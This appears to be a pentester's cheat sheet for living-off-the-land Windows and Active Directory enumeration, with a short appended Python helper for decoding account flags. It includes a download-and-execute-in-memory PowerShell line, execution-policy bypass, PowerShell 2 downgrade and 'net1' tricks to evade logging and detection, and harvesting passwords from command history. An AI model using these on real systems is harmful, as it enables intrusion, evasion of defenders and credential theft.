Living Off the Land Enumeration

Tags: Authenticated, OPSEC, Local

OS Context

Basic enum commands
systeminfo
Summary of the host's information in one tidy output. Running a single command generates fewer logs, so there is less chance a defender notices us on the host.

PowerShell

Get-Module
List imported modules.
Get-ExecutionPolicy -List
Will print the execution policy settings for each scope on a host.
Set-ExecutionPolicy Bypass -Scope Process
This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Get-ChildItem Env: | ft Key,Value
Return environment values such as key paths, users, computer information, etc.
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
With this command, we can get the specified user's PowerShell history. This can be quite helpful, as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
Download a file from the web using PowerShell and execute it from memory.

OPSEC Techniques

powershell.exe -version 2
Downgrade PowerShell to a version that doesn't log (validate with Get-Host).

Checking Defenses

netsh advfirewall show allprofiles
Check firewall profiles
sc query windefend
Check whether Defender is running (from cmd)
Get-MpComputerStatus
Enumerate Defender-specific feature status

Other users on host?

qwinsta

Network Information

arp -a
ipconfig /all
route print
💡

Using arp -a and route print not only helps when enumerating AD environments, but also helps us identify opportunities to pivot to different network segments in any environment.

Windows Management Instrumentation (WMI)

wmic qfe get Caption,Description,HotFixID,InstalledOn
Prints the patch level and description of the Hotfixes applied
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
Displays basic host information, including the attributes in the list
wmic process list /format:list
List all processes
wmic ntdomain list /format:list
DC and domain information
wmic useraccount list /format:list
Displays information about all local accounts and any domain accounts that have logged into the device
wmic group list /format:list
Information about all local groups
wmic sysaccount list /format:list
Dumps information about any system accounts that are being used as service accounts.

Gist: Useful Wmic queries for host and domain enumeration

Net Commands

net accounts
Information about password requirements
net accounts /domain
Password and lockout policy
net group /domain
Information about domain groups
net group "Domain Admins" /domain
List users with domain admin privileges
net group "domain computers" /domain
list domain computers
net group "Domain Controllers" /domain
List computer accounts of domain controllers
net group <domain_group_name> /domain
Users that belong to the group
net groups /domain
List of domain groups

net localgroup
All available groups
net localgroup administrators /domain
List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators
Information about a group (admins)
net localgroup administrators [username] /add
Add user to administrators
net share
Check current shares
net user <ACCOUNT_NAME> /domain
Get information about a user within the domain
net user /domain
List domain users
net user %username%
Information about the current user

net use x: \\computer\share
Mount a share locally
net view
Get a list of computers
net view /all /domain[:domainname]
Shares on the domain
net view \\computer /all
List shares of a computer
net view /domain
List of PCs of the domain

OPSEC

💡

Typing net1 instead of net will execute the same functions without the potential trigger from the net string.

Dsquery

C:\Windows\System32\dsquery.dll
💡

Elevated privileges required for dsquery

dsquery user
List users
dsquery computer
List computers

We can use a dsquery wildcard search to view all objects in an OU, for example.

dsquery * "CN=Users,DC=DOMAIN,DC=LOCAL"
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
Specific search filters (ASREP Roastable)
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
Find DCs
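As an added example (not part of these notes), the Python below emulates the bitwise LDAP matching rule used in the dsquery filters above (OID 1.2.840.113556.1.4.803, plus its 804 "any bit" sibling) and decodes userAccountControl values from dsquery's -attr output, which is handy when auditing exported account flags offline; the sample objects, their values and the flag-name table are assumptions, not from this page.

```python
# Subset of userAccountControl bits relevant to the dsquery filters above
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x001000: "WORKSTATION_TRUST_ACCOUNT",
    0x002000: "SERVER_TRUST_ACCOUNT",    # domain controllers (8192)
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",        # Kerberos pre-auth not required
}
# LDAP extensible matching rules written as (userAccountControl:<oid>:=mask)
LDAP_BIT_AND = "1.2.840.113556.1.4.803"  # every bit in mask must be set
LDAP_BIT_OR = "1.2.840.113556.1.4.804"   # any bit in mask is enough

def bit_rule_matches(rule_oid, uac, mask):
    """Evaluate one bitwise LDAP matching rule against a single UAC value."""
    if rule_oid == LDAP_BIT_AND:
        return (uac & mask) == mask
    if rule_oid == LDAP_BIT_OR:
        return (uac & mask) != 0
    raise ValueError(f"unsupported matching rule {rule_oid}")

def decode_uac(uac):
    """Return the names of the known flags set in a UAC value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]

def parse_dsquery_attr_output(text):
    """Parse 'dsquery * ... -attr distinguishedName userAccountControl' output."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("distinguishedName"):
            continue                    # skip blank lines and the header row
        dn, uac = line.rsplit(None, 1)  # DN may contain spaces; UAC is last
        rows.append((dn, int(uac)))
    return rows

def audit(text, mask, rule_oid=LDAP_BIT_AND):
    """List (DN, decoded flags) for accounts matching the bitwise filter."""
    return [(dn, decode_uac(uac)) for dn, uac in parse_dsquery_attr_output(text)
            if bit_rule_matches(rule_oid, uac, mask)]

# Constructed sample output (hypothetical objects), not captured from a real domain
SAMPLE_OUTPUT = """\
  distinguishedName                                  userAccountControl
  CN=Guest,CN=Users,DC=DOMAIN,DC=LOCAL               66082
  CN=svc-backup,CN=Users,DC=DOMAIN,DC=LOCAL          4260352
  CN=DC01,OU=Domain Controllers,DC=DOMAIN,DC=LOCAL   532480
"""
```

Calling audit(SAMPLE_OUTPUT, 32) reproduces the page's 803 filter for bit 32 and audit(SAMPLE_OUTPUT, 8192) the "Find DCs" one, each returning the matching DNs with their decoded flags.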